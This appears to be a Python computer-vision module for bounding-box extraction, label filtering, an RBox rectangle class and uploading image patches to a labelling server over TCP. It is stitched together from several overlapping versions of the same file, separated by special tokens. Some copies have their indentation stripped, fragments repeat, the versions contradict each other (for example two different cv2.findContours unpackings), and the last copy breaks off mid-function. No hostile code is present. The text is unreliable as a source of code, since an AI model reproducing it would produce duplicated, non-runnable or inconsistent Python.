rbox = RBox()
rbox.x = min(self.x, other_box.x)
rbox.y = min(self.y, other_box.y)
rbox.w = max(self.x + self.w, other_box.x + other_box.w) - rbox.x
rbox.h = max(self.y + self.h, other_box.y + other_box.h) - rbox.y
return rbox
def __and__(self, other_box):
rbox = RBox()
rbox.x = max(self.x, other_box.x)
rbox.y = max(self.y, other_box.y)
rbox.w = min(self.x + self.w, other_box.x + other_box.w) - rbox.x
rbox.h = min(self.y + self.h, other_box.y + other_box.h) - rbox.y
if rbox.w < 0 or rbox.h < 0:
rbox = RBox()
return rbox
def similarity(self, other_box):
min_area = min(self.area(), other_box.area())
return (self & other_box).area() / min_area
def __str__(self):
return '{} {} {} {}'.format(self.x, self.y, self.w, self.h)
def __mul__(self, other_box):
return self.similarity(other_box)
def __eq__(self, other):
return (self.x == other.x and self.y == other.y and self.w == other
.w and self.h == other.h)
@staticmethod
def similarityStats(boxes):
sim_mat = np.array(boxes).reshape((-1, 1))
sim_mat = np.tril(sim_mat.dot(sim_mat.T), -1)
return sim_mat
@staticmethod
def similarityThreshold(boxes, threshold=0.8):
sim_mat = RBox.similarityStats(boxes)
ind = np.array(np.nonzero(sim_mat > threshold))
return list(ind.T)
@staticmethod
def reduceBoxes(boxes, threshold=0.8):
similar_boxes = RBox.similarityThreshold(boxes, threshold)
while len(similar_boxes) > 0:
union = boxes[similar_boxes[0][1]] | boxes[similar_boxes[0][0]]
del boxes[similar_boxes[0][0]]
del boxes[similar_boxes[0][1]]
boxes.append(union)
similar_boxes = RBox.similarityThreshold(boxes, threshold)
return boxes
@staticmethod
def toPointBoundingBoxes(boxes):
return [box.pointBoundingBox() for box in boxes]
@staticmethod
def toClassicBoundingBoxes(boxes):
return [box.classicalBoundingBox() for box in boxes]
def extractPatchFromImage(self, image, square=False):
start, end = self.pointBoundingBox()
start, end = list(start), list(end)
if square:
im_h, im_w = image.shape[0:2]
if self.h != self.w:
if self.h > self.w:
diff = self.h - self.w
if start[0] >= int(diff / 2):
start[0] -= math.floor(diff / 2)
diff -= math.floor(diff / 2)
else:
diff -= start[0]
start[0] = 0
end[0] += diff
if end[0] >= im_w:
diff = end[0] - im_w + 1
end[1] -= diff
else:
diff = self.w - self.h
if start[1] >= int(diff / 2):
start[1] -= math.floor(diff / 2)
diff -= math.floor(diff / 2)
else:
diff -= start[1]
start[1] = 0
end[1] += diff
if end[1] >= im_h:
diff = end[1] - im_h + 1
end[0] -= diff
return image[start[1]:end[1], start[0]:end[0]]
def addPatchtoImage(self, image, patch):
start, end = self.pointBoundingBox()
image[start[1]:end[1], start[0]:end[0]] = patch
return image
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def find_bounding_box(binary_matrix, margins=(0, 0)):
indicies = np.array(np.nonzero(binary_matrix + 0))
ys = margins[1] + np.amin(indicies[0])
ye = margins[1] + np.amax(indicies[0])
xs = margins[0] + np.amin(indicies[1])
xe = margins[0] + np.amax(indicies[1])
return [(xs, ys), (xe, ye)]
<|reserved_special_token_0|>
def findConnectedComponents(frame, threshold=150, blur_radius=1.0):
img = frame.copy()
imgf = ndimage.gaussian_filter(img, blur_radius)
labeled, nr_objects = ndimage.label(imgf > threshold)
return labeled, nr_objects
<|reserved_special_token_0|>
def performColorProcessing(image, mask, iterations=1):
kernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (3, 3))
for i in range(iterations):
model = computePosteriors(image, np.uint8(mask > 0) + 0)
mask = applyModel(image, mask, model)
cv2.morphologyEx(mask, cv2.MORPH_OPEN, kernel=kernel)
return mask
<|reserved_special_token_0|>
class RBox:
def __init__(self):
self.x = 0
self.y = 0
self.w = 0
self.h = 0
@staticmethod
def fromClassicalBoundingBox(box):
rbox = RBox()
rbox.x = box[0]
rbox.y = box[1]
rbox.w = box[2]
rbox.h = box[3]
return rbox
@staticmethod
def fromClassicalBoundingBoxes(boxes):
return [RBox.fromClassicalBoundingBox(box) for box in boxes]
@staticmethod
def fromRoughBoundingBox(box):
rbox = RBox()
rbox.x = box[0]
rbox.y = box[2]
rbox.h = box[1] - box[0]
rbox.w = box[3] - box[2]
return rbox
@staticmethod
def fromPointBoundingBox(box):
rbox = RBox()
rbox.x = box[0][0]
rbox.y = box[0][1]
rbox.w = box[1][0] - box[0][0]
rbox.h = box[1][1] - box[0][1]
return rbox
@staticmethod
def fromPointBoundingBoxes(boxes):
return [RBox.fromPointBoundingBox(box) for box in boxes]
def classicalBoundingBox(self):
return [self.x, self.y, self.w, self.h]
def pointBoundingBox(self):
return (self.x, self.y), (self.x + self.w, self.y + self.h)
def area(self):
return self.h * self.w
def __or__(self, other_box):
rbox = RBox()
rbox.x = min(self.x, other_box.x)
rbox.y = min(self.y, other_box.y)
rbox.w = max(self.x + self.w, other_box.x + other_box.w) - rbox.x
rbox.h = max(self.y + self.h, other_box.y + other_box.h) - rbox.y
return rbox
def __and__(self, other_box):
rbox = RBox()
rbox.x = max(self.x, other_box.x)
rbox.y = max(self.y, other_box.y)
rbox.w = min(self.x + self.w, other_box.x + other_box.w) - rbox.x
rbox.h = min(self.y + self.h, other_box.y + other_box.h) - rbox.y
if rbox.w < 0 or rbox.h < 0:
rbox = RBox()
return rbox
def similarity(self, other_box):
min_area = min(self.area(), other_box.area())
return (self & other_box).area() / min_area
def __str__(self):
return '{} {} {} {}'.format(self.x, self.y, self.w, self.h)
def __mul__(self, other_box):
return self.similarity(other_box)
def __eq__(self, other):
return (self.x == other.x and self.y == other.y and self.w == other
.w and self.h == other.h)
@staticmethod
def similarityStats(boxes):
sim_mat = np.array(boxes).reshape((-1, 1))
sim_mat = np.tril(sim_mat.dot(sim_mat.T), -1)
return sim_mat
@staticmethod
def similarityThreshold(boxes, threshold=0.8):
sim_mat = RBox.similarityStats(boxes)
ind = np.array(np.nonzero(sim_mat > threshold))
return list(ind.T)
@staticmethod
def reduceBoxes(boxes, threshold=0.8):
similar_boxes = RBox.similarityThreshold(boxes, threshold)
while len(similar_boxes) > 0:
union = boxes[similar_boxes[0][1]] | boxes[similar_boxes[0][0]]
del boxes[similar_boxes[0][0]]
del boxes[similar_boxes[0][1]]
boxes.append(union)
similar_boxes = RBox.similarityThreshold(boxes, threshold)
return boxes
@staticmethod
def toPointBoundingBoxes(boxes):
return [box.pointBoundingBox() for box in boxes]
@staticmethod
def toClassicBoundingBoxes(boxes):
return [box.classicalBoundingBox() for box in boxes]
def extractPatchFromImage(self, image, square=False):
start, end = self.pointBoundingBox()
start, end = list(start), list(end)
if square:
im_h, im_w = image.shape[0:2]
if self.h != self.w:
if self.h > self.w:
diff = self.h - self.w
if start[0] >= int(diff / 2):
start[0] -= math.floor(diff / 2)
diff -= math.floor(diff / 2)
else:
diff -= start[0]
start[0] = 0
end[0] += diff
if end[0] >= im_w:
diff = end[0] - im_w + 1
end[1] -= diff
else:
diff = self.w - self.h
if start[1] >= int(diff / 2):
start[1] -= math.floor(diff / 2)
diff -= math.floor(diff / 2)
else:
diff -= start[1]
start[1] = 0
end[1] += diff
if end[1] >= im_h:
diff = end[1] - im_h + 1
end[0] -= diff
return image[start[1]:end[1], start[0]:end[0]]
def addPatchtoImage(self, image, patch):
start, end = self.pointBoundingBox()
image[start[1]:end[1], start[0]:end[0]] = patch
return image
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def find_margined_bounding_boxes(fimage, lables, margins):
boxes = []
for lable in lables:
labled = (fimage == lable) + 0
box = find_bounding_box(labled, margins)
boxes.append(box)
return boxes
def find_bounding_box(binary_matrix, margins=(0, 0)):
indicies = np.array(np.nonzero(binary_matrix + 0))
ys = margins[1] + np.amin(indicies[0])
ye = margins[1] + np.amax(indicies[0])
xs = margins[0] + np.amin(indicies[1])
xe = margins[0] + np.amax(indicies[1])
return [(xs, ys), (xe, ye)]
<|reserved_special_token_0|>
def findConnectedComponents(frame, threshold=150, blur_radius=1.0):
img = frame.copy()
imgf = ndimage.gaussian_filter(img, blur_radius)
labeled, nr_objects = ndimage.label(imgf > threshold)
return labeled, nr_objects
<|reserved_special_token_0|>
def performColorProcessing(image, mask, iterations=1):
kernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (3, 3))
for i in range(iterations):
model = computePosteriors(image, np.uint8(mask > 0) + 0)
mask = applyModel(image, mask, model)
cv2.morphologyEx(mask, cv2.MORPH_OPEN, kernel=kernel)
return mask
<|reserved_special_token_0|>
def killSmallLables(frame, threshold=150):
initial_weights = np.array([np.sum(frame == lable) for lable in range(
np.amax(frame) + 1)])
final_probs = initial_weights < threshold
for lable in range(len(final_probs)):
dying = final_probs[lable]
if dying:
frame -= np.uint8(np.uint8(frame == lable) * lable)
return frame
class RBox:
def __init__(self):
self.x = 0
self.y = 0
self.w = 0
self.h = 0
@staticmethod
def fromClassicalBoundingBox(box):
rbox = RBox()
rbox.x = box[0]
rbox.y = box[1]
rbox.w = box[2]
rbox.h = box[3]
return rbox
@staticmethod
def fromClassicalBoundingBoxes(boxes):
return [RBox.fromClassicalBoundingBox(box) for box in boxes]
@staticmethod
def fromRoughBoundingBox(box):
rbox = RBox()
rbox.x = box[0]
rbox.y = box[2]
rbox.h = box[1] - box[0]
rbox.w = box[3] - box[2]
return rbox
@staticmethod
def fromPointBoundingBox(box):
rbox = RBox()
rbox.x = box[0][0]
rbox.y = box[0][1]
rbox.w = box[1][0] - box[0][0]
rbox.h = box[1][1] - box[0][1]
return rbox
@staticmethod
def fromPointBoundingBoxes(boxes):
return [RBox.fromPointBoundingBox(box) for box in boxes]
def classicalBoundingBox(self):
return [self.x, self.y, self.w, self.h]
def pointBoundingBox(self):
return (self.x, self.y), (self.x + self.w, self.y + self.h)
def area(self):
return self.h * self.w
def __or__(self, other_box):
rbox = RBox()
rbox.x = min(self.x, other_box.x)
rbox.y = min(self.y, other_box.y)
rbox.w = max(self.x + self.w, other_box.x + other_box.w) - rbox.x
rbox.h = max(self.y + self.h, other_box.y + other_box.h) - rbox.y
return rbox
def __and__(self, other_box):
rbox = RBox()
rbox.x = max(self.x, other_box.x)
rbox.y = max(self.y, other_box.y)
rbox.w = min(self.x + self.w, other_box.x + other_box.w) - rbox.x
rbox.h = min(self.y + self.h, other_box.y + other_box.h) - rbox.y
if rbox.w < 0 or rbox.h < 0:
rbox = RBox()
return rbox
def similarity(self, other_box):
min_area = min(self.area(), other_box.area())
return (self & other_box).area() / min_area
def __str__(self):
return '{} {} {} {}'.format(self.x, self.y, self.w, self.h)
def __mul__(self, other_box):
return self.similarity(other_box)
def __eq__(self, other):
return (self.x == other.x and self.y == other.y and self.w == other
.w and self.h == other.h)
@staticmethod
def similarityStats(boxes):
sim_mat = np.array(boxes).reshape((-1, 1))
sim_mat = np.tril(sim_mat.dot(sim_mat.T), -1)
return sim_mat
@staticmethod
def similarityThreshold(boxes, threshold=0.8):
sim_mat = RBox.similarityStats(boxes)
ind = np.array(np.nonzero(sim_mat > threshold))
return list(ind.T)
@staticmethod
def reduceBoxes(boxes, threshold=0.8):
similar_boxes = RBox.similarityThreshold(boxes, threshold)
while len(similar_boxes) > 0:
union = boxes[similar_boxes[0][1]] | boxes[similar_boxes[0][0]]
del boxes[similar_boxes[0][0]]
del boxes[similar_boxes[0][1]]
boxes.append(union)
similar_boxes = RBox.similarityThreshold(boxes, threshold)
return boxes
@staticmethod
def toPointBoundingBoxes(boxes):
return [box.pointBoundingBox() for box in boxes]
@staticmethod
def toClassicBoundingBoxes(boxes):
return [box.classicalBoundingBox() for box in boxes]
def extractPatchFromImage(self, image, square=False):
start, end = self.pointBoundingBox()
start, end = list(start), list(end)
if square:
im_h, im_w = image.shape[0:2]
if self.h != self.w:
if self.h > self.w:
diff = self.h - self.w
if start[0] >= int(diff / 2):
start[0] -= math.floor(diff / 2)
diff -= math.floor(diff / 2)
else:
diff -= start[0]
start[0] = 0
end[0] += diff
if end[0] >= im_w:
diff = end[0] - im_w + 1
end[1] -= diff
else:
diff = self.w - self.h
if start[1] >= int(diff / 2):
start[1] -= math.floor(diff / 2)
diff -= math.floor(diff / 2)
else:
diff -= start[1]
start[1] = 0
end[1] += diff
if end[1] >= im_h:
diff = end[1] - im_h + 1
end[0] -= diff
return image[start[1]:end[1], start[0]:end[0]]
def addPatchtoImage(self, image, patch):
start, end = self.pointBoundingBox()
image[start[1]:end[1], start[0]:end[0]] = patch
return image
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def find_bounding_boxes(fimage, lables):
    """Return one bounding box per label in *lables*.

    For each label, the pixels of *fimage* equal to that label are turned
    into a binary mask and passed to :func:`find_bounding_box`.
    """
    return [find_bounding_box((fimage == lable) + 0) for lable in lables]
def find_margined_bounding_boxes(fimage, lables, margins):
    """Return one bounding box per label, each offset by *margins* (x, y).

    Same as :func:`find_bounding_boxes` but forwards *margins* to
    :func:`find_bounding_box` so the boxes are expressed in the
    coordinates of the un-cropped image.
    """
    return [find_bounding_box((fimage == lable) + 0, margins)
            for lable in lables]
def find_bounding_box(binary_matrix, margins=(0, 0)):
    """Return the bounding box of the nonzero region of *binary_matrix*.

    The result is ``[(x_start, y_start), (x_end, y_end)]`` (inclusive
    extremes), shifted by the (x, y) offsets in *margins*.
    """
    rows, cols = np.nonzero(binary_matrix + 0)
    off_x, off_y = margins
    ys, ye = off_y + rows.min(), off_y + rows.max()
    xs, xe = off_x + cols.min(), off_x + cols.max()
    return [(xs, ys), (xe, ye)]
<|reserved_special_token_0|>
def weightFilterMini(image, weight):
    """Keep only contours whose area is at least *weight* pixels.

    Returns ``(fimage, boxes)`` where *fimage* is a uint8 mask with the
    retained contours filled white (255) and *boxes* is the list of
    point bounding boxes ((x1, y1), (x2, y2)) of those contours.
    """
    image = np.uint8(image)
    # BUG FIX: cv2.findContours returns (image, contours, hierarchy) in
    # OpenCV 3.x but only (contours, hierarchy) in OpenCV 4.x; taking the
    # last two elements works with both versions.
    contours, hierarchy = cv2.findContours(
        image, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)[-2:]
    # retain only sufficiently large contours
    final_contours = [cnt for cnt in contours
                      if cv2.contourArea(cnt) >= weight]
    fimage = np.zeros(image.shape[:2], np.uint8)
    cv2.drawContours(fimage, final_contours, -1, 255, -1)
    boxes = RBox.toPointBoundingBoxes(RBox.fromClassicalBoundingBoxes(
        [cv2.boundingRect(cnt) for cnt in final_contours]))
    return fimage, boxes
def weightFilterMargined(image, lables, weight, margins):
    """Keep labels whose pixel count exceeds *weight*; drop the background.

    *image* is a label map with *lables* labels.  Returns ``(fimage, boxes)``:
    a 0/255 uint8 mask of the retained labels (excluding the heaviest one,
    assumed to be background) and their margin-offset bounding boxes.
    """
    # index of the heaviest label so far (NOTE: shadows the builtin `max`)
    max = 0
    weights = np.zeros(lables)
    fimage = np.zeros_like(image)
    retained_lables = []
    for i in range(lables):
        # pixel count of label i
        weights[i] = np.sum(np.sum(image == i))
        if weights[i] > weights[max]:
            max = i
        if weights[i] > weight:
            fimage += np.uint8((image == i) + 0)
            retained_lables.append(i)
    # remove the heaviest (background) label from the mask.
    # NOTE(review): if no label exceeded *weight* this subtraction runs on an
    # all-zero fimage and wraps around for unsigned dtypes — TODO confirm
    # callers never hit that case.
    fimage -= np.uint8(image == max)
    fimage = np.uint8(fimage * 255)
    boxes = []
    if len(retained_lables) > 0:
        # safe: the heaviest label always passes the threshold whenever any
        # label does, so it is guaranteed to be in the list here
        retained_lables.remove(max)
        boxes = find_margined_bounding_boxes(image.copy(), retained_lables,
            margins)
    return fimage, boxes
def calculatePossiblePadding(box, shape, default=20):
    """Compute how much padding fits around *box* inside an image of *shape*.

    Parameters
    ----------
    box : ((x_start, y_start), (x_end, y_end)) point bounding box.
    shape : image shape tuple, (height, width, ...).
    default : fixed padding in pixels; 0 requests dynamic padding of
        roughly 20.5%% of the box width/height.

    Returns
    -------
    (pad_x_start, pad_x_end, pad_y_start, pad_y_end) — the x-named pads
    are vertical (clipped against height via the y coordinates), the
    y-named pads horizontal, matching the original naming convention.
    """
    w_pad = default
    h_pad = default
    if default == 0:
        # dynamic padding proportional to the box dimensions
        rbox = RBox.fromPointBoundingBox(box)
        w_pad = round(0.205 * rbox.w)
        h_pad = round(0.205 * rbox.h)
    height, width = shape[0:2]
    (x_start, y_start), (x_end, y_end) = box
    # vertical padding above the box (limited by the top edge)
    pad_x_start = h_pad
    if y_start - pad_x_start < 0:
        pad_x_start = y_start
    # horizontal padding left of the box (limited by the left edge)
    pad_y_start = w_pad
    if x_start - pad_y_start < 0:
        pad_y_start = x_start
    # BUG FIX: the end paddings previously used w_pad for the vertical
    # direction and h_pad for the horizontal one (swapped); this only
    # differed from the intended behaviour when default == 0 made the
    # two pads unequal.
    pad_x_end = h_pad
    if y_end + pad_x_end >= height:
        pad_x_end = height - y_end - 1
    pad_y_end = w_pad
    if x_end + pad_y_end >= width:
        pad_y_end = width - x_end - 1
    return pad_x_start, pad_x_end, pad_y_start, pad_y_end
def findConnectedComponents(frame, threshold=150, blur_radius=1.0):
    """Label connected bright regions of a gray-scale frame.

    The frame is Gaussian-smoothed (suppressing tiny specks), thresholded,
    and the binary result labelled.  Returns ``(labeled, nr_objects)``.
    """
    smoothed = ndimage.gaussian_filter(frame.copy(), blur_radius)
    bright = smoothed > threshold
    return ndimage.label(bright)
def drawBoundingBox(im, start, end, color, thickness=1):
    """Draw a rectangle from *start* to *end* on *im* in place.

    *thickness* generalizes the previously hard-coded line width of 1;
    pass -1 for a filled rectangle (cv2 convention).
    """
    cv2.rectangle(im, start, end, color, thickness)
<|reserved_special_token_0|>
def extractPatch(im, box):
    """Return the sub-image of *im* selected by box = (x1, x2, y1, y2)."""
    rows = slice(box[0], box[1])
    cols = slice(box[2], box[3])
    return im[rows, cols, :]
def randomColor():
    """Return a random BGR color as a plain list of three ints in [0, 255)."""
    channels = np.random.randint(0, 255, size=(3,))
    return channels.tolist()
def performColorProcessing(image, mask, iterations=1):
    """Iteratively refine *mask* with a color model fitted on *image*.

    Each iteration fits posteriors on the current binary mask and
    re-applies the model (computePosteriors/applyModel come from the
    pixcel module).  Returns the refined mask.
    """
    kernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (3, 3))
    for i in range(iterations):
        model = computePosteriors(image, np.uint8(mask > 0) + 0)
        mask = applyModel(image, mask, model)
        # NOTE(review): the result of this morphological opening is
        # discarded — cv2.morphologyEx does not operate in place, so this
        # call currently has no effect; presumably it was meant to be
        # `mask = cv2.morphologyEx(...)`.  TODO confirm intent.
        cv2.morphologyEx(mask, cv2.MORPH_OPEN, kernel=kernel)
    return mask
def killDyingLables(frame, mask, threshold=0.5):
    """Zero out labels that lose too many pixels under *mask*.

    A label "dies" when fewer than *threshold* of its original pixels in
    the label map *frame* survive the binary *mask*; its surviving pixels
    are then erased (set to 0).  Returns the masked, cleaned label map.
    """
    n_lables = np.amax(frame) + 1
    survivors = frame * mask
    for lable in range(n_lables):
        # epsilon avoids division by zero for labels absent from frame
        before = np.sum(frame == lable) + 1e-05
        after = np.sum(survivors == lable)
        if after / before < threshold:
            # erase the dying label; killed pixels become 0, which cannot
            # affect the counts of the still-unprocessed (higher) labels
            survivors -= np.uint8((survivors == lable) * lable)
    return survivors
def killSmallLables(frame, threshold=150):
    """Erase (set to 0) every label whose pixel count is below *threshold*.

    Mutates the label map *frame* in place and returns it as well.
    """
    n_lables = np.amax(frame) + 1
    # counts are taken before any label is erased
    counts = [np.sum(frame == lable) for lable in range(n_lables)]
    for lable, count in enumerate(counts):
        if count < threshold:
            # subtracting `lable` at its own pixels zeroes them out
            frame -= np.uint8(np.uint8(frame == lable) * lable)
    return frame
class RBox:
    """Axis-aligned rectangle stored as top-left origin (x, y) plus (w, h).

    Converts between several bounding-box formats, supports union (``|``),
    intersection (``&``), overlap similarity (``*``), merging of
    near-duplicate boxes, and extracting/patching image regions.
    """

    def __init__(self):
        # all-zero box; also used as the "empty" result of a disjoint `&`
        self.x = 0
        self.y = 0
        self.w = 0
        self.h = 0

    @staticmethod
    def fromClassicalBoundingBox(box):
        """Build an RBox from a [x, y, w, h] sequence (cv2.boundingRect style)."""
        rbox = RBox()
        rbox.x = box[0]
        rbox.y = box[1]
        rbox.w = box[2]
        rbox.h = box[3]
        return rbox

    @staticmethod
    def fromClassicalBoundingBoxes(boxes):
        """Vector form of :meth:`fromClassicalBoundingBox`."""
        return [RBox.fromClassicalBoundingBox(box) for box in boxes]

    @staticmethod
    def fromRoughBoundingBox(box):
        """Build an RBox from a 4-tuple of extents.

        NOTE(review): this maps box[0]/box[2] to x/y but pairs h with the
        box[1]-box[0] span — i.e. it assumes the rough box is ordered
        (first_axis_start, first_axis_end, second_axis_start,
        second_axis_end); verify against the callers that produce it.
        """
        rbox = RBox()
        rbox.x = box[0]
        rbox.y = box[2]
        rbox.h = box[1] - box[0]
        rbox.w = box[3] - box[2]
        return rbox

    @staticmethod
    def fromPointBoundingBox(box):
        """Build an RBox from ((x_start, y_start), (x_end, y_end))."""
        rbox = RBox()
        rbox.x = box[0][0]
        rbox.y = box[0][1]
        rbox.w = box[1][0] - box[0][0]
        rbox.h = box[1][1] - box[0][1]
        return rbox

    @staticmethod
    def fromPointBoundingBoxes(boxes):
        """Vector form of :meth:`fromPointBoundingBox`."""
        return [RBox.fromPointBoundingBox(box) for box in boxes]

    def classicalBoundingBox(self):
        """Return [x, y, w, h]."""
        return [self.x, self.y, self.w, self.h]

    def pointBoundingBox(self):
        """Return ((x_start, y_start), (x_end, y_end))."""
        return (self.x, self.y), (self.x + self.w, self.y + self.h)

    def area(self):
        """Return the box area in pixels."""
        return self.h * self.w

    def __or__(self, other_box):
        """Union: the smallest box containing both operands."""
        rbox = RBox()
        rbox.x = min(self.x, other_box.x)
        rbox.y = min(self.y, other_box.y)
        rbox.w = max(self.x + self.w, other_box.x + other_box.w) - rbox.x
        rbox.h = max(self.y + self.h, other_box.y + other_box.h) - rbox.y
        return rbox

    def __and__(self, other_box):
        """Intersection; an all-zero RBox when the boxes are disjoint."""
        rbox = RBox()
        rbox.x = max(self.x, other_box.x)
        rbox.y = max(self.y, other_box.y)
        rbox.w = min(self.x + self.w, other_box.x + other_box.w) - rbox.x
        rbox.h = min(self.y + self.h, other_box.y + other_box.h) - rbox.y
        if rbox.w < 0 or rbox.h < 0:
            # negative extent means no overlap: collapse to the empty box
            rbox = RBox()
        return rbox

    def similarity(self, other_box):
        """Overlap ratio: intersection area over the smaller box's area.

        NOTE(review): raises ZeroDivisionError if either box has zero
        area — TODO confirm callers never pass degenerate boxes.
        """
        min_area = min(self.area(), other_box.area())
        return (self & other_box).area() / min_area

    def __str__(self):
        return '{} {} {} {}'.format(self.x, self.y, self.w, self.h)

    def __mul__(self, other_box):
        """``a * b`` is shorthand for ``a.similarity(b)``."""
        return self.similarity(other_box)

    def __eq__(self, other):
        # component-wise equality (defining __eq__ without __hash__ makes
        # RBox unhashable, which no current caller relies on)
        return (self.x == other.x and self.y == other.y and self.w == other
            .w and self.h == other.h)

    @staticmethod
    def similarityStats(boxes):
        """Return the strict-lower-triangular pairwise similarity matrix.

        The object-array outer product sim_mat.dot(sim_mat.T) invokes
        RBox.__mul__ element-wise, so entry (i, j) is boxes[i] * boxes[j];
        np.tril(..., -1) keeps each unordered pair once (row > col).
        """
        sim_mat = np.array(boxes).reshape((-1, 1))
        sim_mat = np.tril(sim_mat.dot(sim_mat.T), -1)
        return sim_mat

    @staticmethod
    def similarityThreshold(boxes, threshold=0.8):
        """Return [row, col] index pairs of boxes more similar than *threshold*."""
        sim_mat = RBox.similarityStats(boxes)
        ind = np.array(np.nonzero(sim_mat > threshold))
        return list(ind.T)

    @staticmethod
    def reduceBoxes(boxes, threshold=0.8):
        """Repeatedly merge pairs of boxes whose similarity exceeds *threshold*.

        Mutates (and returns) *boxes*: each similar pair is replaced by its
        union until no pair passes the threshold.
        """
        similar_boxes = RBox.similarityThreshold(boxes, threshold)
        while len(similar_boxes) > 0:
            union = boxes[similar_boxes[0][1]] | boxes[similar_boxes[0][0]]
            # delete the larger index first so the smaller stays valid
            # (tril guarantees [0][0] > [0][1])
            del boxes[similar_boxes[0][0]]
            del boxes[similar_boxes[0][1]]
            boxes.append(union)
            similar_boxes = RBox.similarityThreshold(boxes, threshold)
        return boxes

    @staticmethod
    def toPointBoundingBoxes(boxes):
        """Convert a list of RBoxes to point-pair bounding boxes."""
        return [box.pointBoundingBox() for box in boxes]

    @staticmethod
    def toClassicBoundingBoxes(boxes):
        """Convert a list of RBoxes to [x, y, w, h] bounding boxes."""
        return [box.classicalBoundingBox() for box in boxes]

    def extractPatchFromImage(self, image, square=False):
        """Crop this box out of *image*; optionally expand to a square.

        With ``square=True`` the shorter side is grown symmetrically
        (clamped at the image borders); if the growth would run past the
        far border, the longer side is shrunk instead to keep the patch
        square.
        """
        start, end = self.pointBoundingBox()
        start, end = list(start), list(end)
        if square:
            im_h, im_w = image.shape[0:2]
            if self.h != self.w:
                if self.h > self.w:
                    # widen horizontally by the height/width difference
                    diff = self.h - self.w
                    if start[0] >= int(diff / 2):
                        start[0] -= math.floor(diff / 2)
                        diff -= math.floor(diff / 2)
                    else:
                        # not enough room on the left: clamp and push right
                        diff -= start[0]
                        start[0] = 0
                    end[0] += diff
                    if end[0] >= im_w:
                        # ran off the right edge: shrink vertically instead
                        diff = end[0] - im_w + 1
                        end[1] -= diff
                else:
                    # grow vertically by the width/height difference
                    diff = self.w - self.h
                    if start[1] >= int(diff / 2):
                        start[1] -= math.floor(diff / 2)
                        diff -= math.floor(diff / 2)
                    else:
                        # not enough room above: clamp and push down
                        diff -= start[1]
                        start[1] = 0
                    end[1] += diff
                    if end[1] >= im_h:
                        # ran off the bottom edge: shrink horizontally instead
                        diff = end[1] - im_h + 1
                        end[0] -= diff
        return image[start[1]:end[1], start[0]:end[0]]

    def addPatchtoImage(self, image, patch):
        """Write *patch* into *image* at this box's position (in place)."""
        start, end = self.pointBoundingBox()
        image[start[1]:end[1], start[0]:end[0]] = patch
        return image
def askForLable(patch):
    """Send *patch* to the labelling server and return its label string.

    The patch is written to disk as ``patch.jpg``, streamed over TCP to
    (TCP_IP, TCP_PORT) in BUFFER_SIZE chunks, the write side is shut
    down to signal end-of-upload, and the server's reply is decoded as
    UTF-8.
    """
    cv2.imwrite('patch.jpg', patch)
    clientSock = socket(AF_INET, SOCK_STREAM)
    try:
        clientSock.connect((TCP_IP, TCP_PORT))
        # `with` closes the file even if a send fails
        with open('patch.jpg', 'rb') as image:
            data = image.read(BUFFER_SIZE)
            while data:
                # BUG FIX: use sendall — plain send() may write only part
                # of the buffer, silently truncating the upload
                clientSock.sendall(data)
                data = image.read(BUFFER_SIZE)
        # half-close: tells the server the image stream is complete
        clientSock.shutdown(SHUT_WR)
        label = clientSock.recv(1024)
        return label.decode('utf-8')
    finally:
        # BUG FIX: the socket was previously leaked (never closed)
        clientSock.close()
<|reserved_special_token_1|>
import numpy as np
import cv2
from pixcel import *
from scipy import ndimage
import math
from socket import *
from config import *
from time import time
def find_bounding_boxes(fimage, lables):
# initialize boxes array
boxes = []
for lable in lables:
# iterate all lables
# filter out image pixels with current lable
labled = (fimage == lable) + 0
# find indexes
box = find_bounding_box(labled)
# append found bouding box
boxes.append(box)
return boxes
def find_margined_bounding_boxes(fimage, lables, margins):
# initialize boxes array
boxes = []
for lable in lables:
# iterate all lables
# filter out image pixels with current lable
labled = (fimage == lable) + 0
# find indexes
box = find_bounding_box(labled, margins)
# append found bouding box
boxes.append(box)
return boxes
def find_bounding_box(binary_matrix, margins=(0, 0)):
# extract indexes of foreground pixels
indicies = np.array(np.nonzero(binary_matrix + 0))
# get contours
ys = margins[1] + np.amin(indicies[0])
ye = margins[1] + np.amax(indicies[0])
xs = margins[0] + np.amin(indicies[1])
xe = margins[0] + np.amax(indicies[1])
# return contours
return [(xs, ys), (xe, ye)]
def weightFilter(image, lables, weight):
    """Keep labels whose pixel count exceeds *weight*; drop the background.

    Same scheme as weightFilterMargined but without margin offsets:
    returns ``(fimage, boxes)`` — a 0/255 uint8 mask of the retained
    labels (minus the heaviest one, assumed background) and their
    bounding boxes.
    """
    # index of the heaviest label so far (NOTE: shadows the builtin `max`)
    max = 0
    weights = np.zeros((lables))
    fimage = np.zeros_like(image)
    retained_lables = []
    for i in range(lables):
        # pixel count of label i
        weights[i] = np.sum(np.sum(image == i))
        if weights[i] > weights[max]:
            max = i
        if weights[i] > weight:
            fimage += np.uint8((image == i) + 0)
            retained_lables.append(i)
    # remove the heaviest (background) label from the mask.
    # NOTE(review): if no label exceeded *weight* this subtraction runs on an
    # all-zero fimage and wraps around for unsigned dtypes — TODO confirm
    # callers never hit that case.
    fimage -= np.uint8((image == max) + 0)
    fimage = np.uint8(fimage * 255)
    boxes = []
    if (len(retained_lables) > 0):
        # safe: the heaviest label always passes the threshold whenever any
        # label does, so it is guaranteed to be in the list here
        retained_lables.remove(max)
        boxes = find_bounding_boxes(image.copy(), retained_lables)
    return fimage, boxes
def weightFilterMini(image, weight):
image = np.uint8(image)
# extract contours
image, contours, hierarchy = cv2.findContours(image, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
final_contours = []
for cnt in contours:
if cv2.contourArea(cnt) >= weight:
# add it to final_contours
final_contours.append(cnt)
fimage = np.zeros((image.shape[:2]), np.uint8)
cv2.drawContours(fimage, final_contours, -1, 255, -1)
boxes = RBox.toPointBoundingBoxes(RBox.fromClassicalBoundingBoxes([cv2.boundingRect(cnt) for cnt in final_contours]))
return fimage, boxes
def weightFilterMargined(image, lables, weight, margins):
max = 0
weights = np.zeros((lables))
fimage = np.zeros_like(image)
retained_lables = []
for i in range(lables):
weights[i] = np.sum(np.sum(image == i))
if weights[i] > weights[max]:
max = i
